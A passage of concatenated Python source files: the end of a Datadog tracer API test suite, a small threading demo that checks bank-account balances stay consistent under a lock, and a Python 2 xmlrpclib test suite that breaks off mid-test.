js=None,
log='Unable to parse Datadog Agent JSON response: .*? \'error:unsupported-endpoint\'',
),
42: dict( # int as key to trigger TypeError
js=None,
log='Unable to parse Datadog Agent JSON response: .*? 42',
),
'{}': dict(js={}),
'[]': dict(js=[]),
# Priority sampling "rate_by_service" response
('{"rate_by_service": '
'{"service:,env:":0.5, "service:mcnulty,env:test":0.9, "service:postgres,env:test":0.6}}'): dict(
js=dict(
rate_by_service={
'service:,env:': 0.5,
'service:mcnulty,env:test': 0.9,
'service:postgres,env:test': 0.6,
},
),
),
' [4,2,1] ': dict(js=[4, 2, 1]),
}
for k, v in iteritems(test_cases):
log.reset_mock()
r = Response.from_http_response(ResponseMock(k))
js = r.get_json()
assert v['js'] == js
if 'log' in v:
log.assert_called_once()
msg = log.call_args[0][0] % log.call_args[0][1:]
assert re.match(v['log'], msg), msg
@mock.patch('ddtrace.compat.httplib.HTTPConnection')
def test_put_connection_close(self, HTTPConnection):
"""
When calling API._put
we close the HTTPConnection we create
"""
HTTPConnection.return_value = self.conn
with warnings.catch_warnings(record=True) as w:
self.api._put('/test', '<test data>', 1)
self.assertEqual(len(w), 0, 'Test raised unexpected warnings: {0!r}'.format(w))
self.conn.request.assert_called_once()
self.conn.close.assert_called_once()
@mock.patch('ddtrace.compat.httplib.HTTPConnection')
def test_put_connection_close_exception(self, HTTPConnection):
"""
When calling API._put raises an exception
we close the HTTPConnection we create
"""
HTTPConnection.return_value = self.conn
# Ensure calling `request` raises an exception
self.conn.request.side_effect = Exception
with warnings.catch_warnings(record=True) as w:
with self.assertRaises(Exception):
self.api._put('/test', '<test data>', 1)
self.assertEqual(len(w), 0, 'Test raised unexpected warnings: {0!r}'.format(w))
self.conn.request.assert_called_once()
self.conn.close.assert_called_once()
def test_flush_connection_timeout_connect():
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, 2019)
response = api._flush(payload)
if PY3:
assert isinstance(response, (OSError, ConnectionRefusedError)) # noqa: F821
else:
assert isinstance(response, socket.error)
assert response.errno in (99, 111)
def test_flush_connection_timeout(endpoint_test_timeout_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, _TIMEOUT_PORT)
response = api._flush(payload)
assert isinstance(response, socket.timeout)
def test_flush_connection_reset(endpoint_test_reset_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, _RESET_PORT)
response = api._flush(payload)
if PY3:
assert isinstance(response, (httplib.BadStatusLine, ConnectionResetError)) # noqa: F821
else:
assert isinstance(response, httplib.BadStatusLine)
def test_flush_connection_uds(endpoint_uds_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, 2019, uds_path=endpoint_uds_server.server_address)
response = api._flush(payload)
assert response.status == 200
@mock.patch('ddtrace.internal.runtime.container.get_container_info')
def test_api_container_info(get_container_info):
# When we have container information
# DEV: `get_container_info` will return a `CGroupInfo` with a `container_id` or `None`
info = CGroupInfo(container_id='test-container-id')
get_container_info.return_value = info
api = API(_HOST, 8126)
assert api._container_info is info
assert api._headers['Datadog-Container-Id'] == 'test-container-id'
# When we do not have container information
get_container_info.return_value = None
api = API(_HOST, 8126)
assert api._container_info is None
assert 'Datadog-Container-Id' not in api._headers
|
mine_safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
accounts_balance_lock = RLock()
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
with accounts_balance_lock:
from_account.balance -= amount
time.sleep(0.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
with accounts_balance_lock:
current = sum(a.balance for a in accounts)
if current != total:
print(
"ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
),
flush=True,
)
elif not quiet:
print(
"All good: Consistent account balance: ${:,}".format(total),
flush=True,
)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == "__main__":
main()
|
test_xmlrpc.py
|
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import mimetools
import httplib
import socket
import StringIO
import os
import re
from test import test_support
try:
import threading
except ImportError:
threading = None
try:
import gzip
except ImportError:
gzip = None
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
if test_support.have_unicode:
alist[0].update({
'unicode': test_support.u(r'\u4000\u6000\u8000'),
test_support.u(r'ukey\u4000'): 'regular value',
})
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEqual(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEqual(newdt, dt)
self.assertEqual(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEqual(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEqual(newdt, dt)
self.assertEqual(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEqual(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assertTrue(dt == now)
self.assertTrue(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assertTrue(then >= dt)
self.assertTrue(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assertIsInstance(new_d.value, str)
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assertIsInstance(s, str)
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEqual(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEqual(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
@test_support.requires_unicode
def test_dump_encoding(self):
value = {test_support.u(r'key\u20ac\xa4'):
test_support.u(r'value\u20ac\xa4')}
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15')
strg = "<?xml version='1.0' encoding='iso-8859-15'?>" + strg
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodresponse=True)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
methodname = test_support.u(r'method\u20ac\xa4')
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodname=methodname)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
self.assertEqual(xmlrpclib.loads(strg)[1], methodname)
@test_support.requires_unicode
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. Import a temporary fresh copy to get access to it
# but then restore the original copy to avoid messing with
# other potentially modified sys module attributes
old_encoding = sys.getdefaultencoding()
with test_support.CleanImport('sys'):
import sys as temp_sys
temp_sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
temp_sys.setdefaultencoding(old_encoding)
items = d.items()
if test_support.have_unicode:
self.assertEqual(s, u"abc \x95")
self.assertIsInstance(s, unicode)
self.assertEqual(items, [(u"def \x96", u"ghi \x97")])
self.assertIsInstance(items[0][0], unicode)
self.assertIsInstance(items[0][1], unicode)
else:
self.assertEqual(s, "abc \xc2\x95")
self.assertEqual(items, [("def \xc2\x96", "ghi \xc2\x97")])
def test_loads_unsupported(self):
ResponseError = xmlrpclib.ResponseError
data = '<params><param><value><spam/></value></param></params>'
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><array>'
'<value><spam/></value>'
'</array></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><struct>'
'<member><name>a</name><value><spam/></value></member>'
'<member><name>b</name><value><spam/></value></member>'
'</struct></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEqual(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEqual(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t1, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None, encoding=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
serv = MyXMLRPCServer(("localhost", 0), requestHandler,
encoding=encoding,
logRequests=False, bind_and_activate=False)
try:
serv.socket.settimeout(3)
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(lambda x: x, test_support.u(r't\xea\u0161t'))
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
def http_multi_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.MultiPathXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
class MyRequestHandler(requestHandler):
rpc_paths = []
serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
try:
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
paths = ["/foo", "/foo/bar"]
for path in paths:
d = serv.add_dispatcher(path, SimpleXMLRPCServer.SimpleXMLRPCDispatcher())
d.register_introspection_functions()
d.register_multicall_functions()
serv.get_dispatcher(paths[0]).register_function(pow)
serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
@unittest.skipUnless(threading, 'Threading required for this test.')
class BaseServerTestCase(unittest.TestCase):
requestHandler = None
request_count = 1
threadFunc = staticmethod(http_server)
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, self.request_count, self.requestHandler)
threading.Thread(target=self.threadFunc, args=serv_args).start()
# wait for the server to be ready
self.evt.wait(10)
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
test_support.gc_collect() # to close the active connections
self.evt.wait(10)
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(BaseServerTestCase):
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@test_support.requires_unicode
def test_nonascii(self):
start_string = test_support.u(r'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t')
end_string = test_support.u(r'h\N{LATIN SMALL LETTER O WITH HORN}n')
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@test_support.requires_unicode
def test_unicode_host(self):
server = xmlrpclib.ServerProxy(u"http://%s:%d/RPC2"%(ADDR, PORT))
self.assertEqual(server.add("a", u"\xe9"), u"a\xe9")
@test_support.requires_unicode
def test_client_encoding(self):
start_string = unichr(0x20ac)
end_string = unichr(0xa4)
try:
p = xmlrpclib.ServerProxy(URL, encoding='iso-8859-15')
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@test_support.requires_unicode
def test_nonascii_methodname(self):
try:
p = xmlrpclib.ServerProxy(URL, encoding='iso-8859-15')
m = getattr(p, 't\xea\xa8t')
self.assertEqual(m(42), 42)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection(ADDR, PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
test_support.u(r't\xea\u0161t'),
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assertTrue(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
def test_partial_post(self):
# Check that a partial POST doesn't make the server loop: issue #14001.
conn = httplib.HTTPConnection(ADDR, PORT)
conn.request('POST', '/RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nbye')
conn.close()
class SimpleServerEncodingTestCase(BaseServerTestCase):
@staticmethod
def threadFunc(evt, numrequests, requestHandler=None, encoding=None):
http_server(evt, numrequests, requestHandler, 'iso-8859-15')
@test_support.requires_unicode
def test_server_encoding(self):
start_string = unichr(0x20ac)
end_string = unichr(0xa4)
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
class MultiPathServerTestCase(BaseServerTestCase):
threadFunc = staticmethod(http_multi_server)
request_count = 2
def test_path1(self):
p = xmlrpclib.ServerProxy(URL+"/foo")
self.assertEqual(p.pow(6,8), 6**8)
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
def test_path2(self):
p = xmlrpclib.ServerProxy(URL+"/foo/bar")
self.assertEqual(p.add(6,8), 6+8)
self.assertRaises(xmlrpclib.Fault, p.pow, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
myRequests = []
def handle(self):
self.myRequests.append([])
self.reqidx = len(self.myRequests)-1
return self.parentClass.handle(self)
def handle_one_request(self):
result = self.parentClass.handle_one_request(self)
self.myRequests[self.reqidx].append(self.raw_requestline)
return result
requestHandler = RequestHandler
def setUp(self):
#clear request log
self.RequestHandler.myRequests = []
return BaseServerTestCase.setUp(self)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
def test_two(self):
p = xmlrpclib.ServerProxy(URL)
#do three requests.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#they should have all been handled by a single request handler
self.assertEqual(len(self.RequestHandler.myRequests), 1)
#check that we did at least two (the third may be pending append
#due to thread scheduling)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
#ask for two keepalive requests to be handled.
request_count=2
def test_close(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")() #this should trigger a new keep-alive request
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#they should have all been two request handlers, each having logged at least
#two complete requests
self.assertEqual(len(self.RequestHandler.myRequests), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)
def test_transport(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
p("transport").close() #same as above, really.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
@unittest.skipUnless(gzip, 'gzip not available')
class GzipServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
def do_POST(self):
#store content of last request in class
self.__class__.content_length = int(self.headers["content-length"])
return self.parentClass.do_POST(self)
requestHandler = RequestHandler
class Transport(xmlrpclib.Transport):
#custom transport, stores the response length for our perusal
fake_gzip = False
def parse_response(self, response):
self.response_length=int(response.getheader("content-length", 0))
return xmlrpclib.Transport.parse_response(self, response)
def send_content(self, connection, body):
if self.fake_gzip:
#add a lone gzip header to induce decode error remotely
connection.putheader("Content-Encoding", "gzip")
return xmlrpclib.Transport.send_content(self, connection, body)
def setUp(self):
BaseServerTestCase.setUp(self)
def test_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
p = xmlrpclib.ServerProxy(URL, transport=t)
self.assertEqual(p.pow(6,8), 6**8)
a = self.RequestHandler.content_length
t.encode_threshold = 0 #turn on request encoding
self.assertEqual(p.pow(6,8), 6**8)
b = self.RequestHandler.content_length
self.assertTrue(a>b)
def test_bad_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
t.fake_gzip = True
p = xmlrpclib.ServerProxy(URL, transport=t)
cm = self.assertRaisesRegexp(xmlrpclib.ProtocolError,
re.compile(r"\b400\b"))
with cm:
p.pow(6, 8)
def test_gzip_response(self):
t = self.Transport()
p = xmlrpclib.ServerProxy(URL, transport=t)
old = self.requestHandler.encode_threshold
